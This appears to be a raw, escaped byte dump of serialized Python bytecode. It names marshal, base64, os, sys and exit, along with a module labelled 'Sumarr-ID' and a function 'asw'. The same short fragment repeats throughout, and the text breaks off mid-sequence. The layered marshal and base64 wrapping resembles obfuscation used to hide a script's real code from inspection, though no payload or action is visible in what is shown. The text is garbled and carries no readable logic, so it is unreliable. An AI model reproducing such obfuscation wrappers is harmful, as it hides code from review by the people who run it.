\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x